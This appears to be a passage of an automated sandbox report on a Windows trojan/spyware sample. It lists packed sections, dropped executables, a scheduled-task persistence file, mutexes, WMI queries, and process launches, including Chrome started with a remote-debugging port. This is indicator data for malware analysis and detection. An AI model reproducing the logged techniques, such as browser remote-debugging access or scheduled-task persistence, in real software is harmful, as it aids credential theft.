Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50240 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 6693ff7180.exe, 00000012.00000002.2802281447.00000000010A2000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b306d131-7
Source: 6693ff7180.exe, 00000012.00000002.2802281447.00000000010A2000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4b58faa4-d
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: EBAEBFIIEC.exe.0.dr Static PE information: section name:
Source: EBAEBFIIEC.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.9.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name: .idata
Source: random[2].exe.12.dr Static PE information: section name:
Source: random[2].exe.12.dr Static PE information: section name: .idata
Source: 9c573f8941.exe.12.dr Static PE information: section name:
Source: 9c573f8941.exe.12.dr Static PE information: section name: .idata
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name: .idata
Source: random[1].exe.12.dr Static PE information: section name:
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name:
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name: .idata
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name:
Source: random[1].exe0.12.dr Static PE information: section name:
Source: random[1].exe0.12.dr Static PE information: section name: .idata
Source: random[1].exe0.12.dr Static PE information: section name:
Source: 5a20612cd1.exe.12.dr Static PE information: section name:
Source: 5a20612cd1.exe.12.dr Static PE information: section name: .idata
Source: 5a20612cd1.exe.12.dr Static PE information: section name:
Source: random[1].exe1.12.dr Static PE information: section name:
Source: random[1].exe1.12.dr Static PE information: section name: .idata
Source: random[1].exe1.12.dr Static PE information: section name:
Source: 0882197cda.exe.12.dr Static PE information: section name:
Source: 0882197cda.exe.12.dr Static PE information: section name: .idata
Source: 0882197cda.exe.12.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C57ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5BB700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C5BB8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C5BB910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C55F280
Creates files inside the system directory
Source: C:\Users\user\Documents\EBAEBFIIEC.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5535A0 0_2_6C5535A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C545C 0_2_6C5C545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C565440 0_2_6C565440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C595C10 0_2_6C595C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A2C10 0_2_6C5A2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CAC00 0_2_6C5CAC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C542B 0_2_6C5C542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57D4D0 0_2_6C57D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5664C0 0_2_6C5664C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C596CF0 0_2_6C596CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55D4E0 0_2_6C55D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C566C80 0_2_6C566C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B34A0 0_2_6C5B34A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC4A0 0_2_6C5BC4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57ED10 0_2_6C57ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C580512 0_2_6C580512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56FD00 0_2_6C56FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C590DD0 0_2_6C590DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B85F0 0_2_6C5B85F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C579E50 0_2_6C579E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C593E50 0_2_6C593E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A2E4E 0_2_6C5A2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C574640 0_2_6C574640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55C670 0_2_6C55C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C6E63 0_2_6C5C6E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C597E10 0_2_6C597E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A5600 0_2_6C5A5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B9E30 0_2_6C5B9E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55BEF0 0_2_6C55BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56FEF0 0_2_6C56FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C76E3 0_2_6C5C76E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C575E90 0_2_6C575E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BE680 0_2_6C5BE680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B4EA0 0_2_6C5B4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C597710 0_2_6C597710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C569F00 0_2_6C569F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C586FF0 0_2_6C586FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55DFE0 0_2_6C55DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A77A0 0_2_6C5A77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C578850 0_2_6C578850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57D850 0_2_6C57D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59F070 0_2_6C59F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C567810 0_2_6C567810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59B820 0_2_6C59B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A4820 0_2_6C5A4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C50C7 0_2_6C5C50C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57C0E0 0_2_6C57C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5958E0 0_2_6C5958E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5860A0 0_2_6C5860A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57A940 0_2_6C57A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AB970 0_2_6C5AB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CB170 0_2_6C5CB170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56D960 0_2_6C56D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C595190 0_2_6C595190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B2990 0_2_6C5B2990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58D9B0 0_2_6C58D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55C9A0 0_2_6C55C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C599A60 0_2_6C599A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C598AC0 0_2_6C598AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C571AF0 0_2_6C571AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59E2F0 0_2_6C59E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CBA90 0_2_6C5CBA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56CAB0 0_2_6C56CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C2AB0 0_2_6C5C2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5522A0 0_2_6C5522A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C584AA0 0_2_6C584AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C555340 0_2_6C555340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C370 0_2_6C56C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59D320 0_2_6C59D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C53C8 0_2_6C5C53C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55F380 0_2_6C55F380
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_005B7049 9_2_005B7049
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_005B8860 9_2_005B8860
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_005B78BB 9_2_005B78BB
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_00688101 9_2_00688101
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_005B31A8 9_2_005B31A8
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_00574B30 9_2_00574B30
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_005B2D10 9_2_005B2D10
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_00574DE0 9_2_00574DE0
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_005A7F36 9_2_005A7F36
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_005B779B 9_2_005B779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00FC78BB 10_2_00FC78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00FC8860 10_2_00FC8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00FC7049 10_2_00FC7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00FC31A8 10_2_00FC31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00F84B30 10_2_00F84B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00F84DE0 10_2_00F84DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00FC2D10 10_2_00FC2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00FC779B 10_2_00FC779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00FB7F36 10_2_00FB7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00FC78BB 11_2_00FC78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00FC8860 11_2_00FC8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00FC7049 11_2_00FC7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00FC31A8 11_2_00FC31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00F84B30 11_2_00F84B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00F84DE0 11_2_00F84DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00FC2D10 11_2_00FC2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00FC779B 11_2_00FC779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00FB7F36 11_2_00FB7F36
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D0FD00 13_3_04D0FD00
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D0DF87 13_3_04D0DF87
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D19706 13_3_04D19706
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D03120 13_3_04D03120
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D022C0 13_3_04D022C0
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D0E2C9 13_3_04D0E2C9
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D14AEE 13_3_04D14AEE
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D0AA90 13_3_04D0AA90
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D15219 13_3_04D15219
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D04350 13_3_04D04350
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: String function: 005880C0 appears 130 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C58CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5994D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: String function: 04D09B60 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00F9DF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00F980C0 appears 260 times
PE file contains executable resources (Code or Archives)
Source: random[1].exe.12.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 3e3be1ecc4.exe.12.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2220844676.000000000C319000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIv vs file.exe
Source: file.exe, 00000000.00000002.2226297270.000000006C7D5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2225932171.000000006C5E2000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: xokcbvfd ZLIB complexity 0.9945959834806712
Source: random[1].exe0.12.dr Static PE information: Section: ZLIB complexity 0.9976616565743944
Source: random[1].exe0.12.dr Static PE information: Section: rmyngibq ZLIB complexity 0.9944709241207951
Source: 5a20612cd1.exe.12.dr Static PE information: Section: ZLIB complexity 0.9976616565743944
Source: 5a20612cd1.exe.12.dr Static PE information: Section: rmyngibq ZLIB complexity 0.9944709241207951
Source: random[1].exe1.12.dr Static PE information: Section: xokcbvfd ZLIB complexity 0.9945959834806712
Source: 0882197cda.exe.12.dr Static PE information: Section: xokcbvfd ZLIB complexity 0.9945959834806712
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@102/48@59/17
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C5B7030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\MF23BC98.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:64:WilError_03
Source: C:\Users\user\Documents\EBAEBFIIEC.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2225176818.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2225176818.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2225176818.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2225176818.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2225176818.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2225176818.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2225176818.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.1958815332.00000000061D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2225176818.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2225176818.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 44%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1992,i,1316480559027049210,2605182806938244221,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBAEBFIIEC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
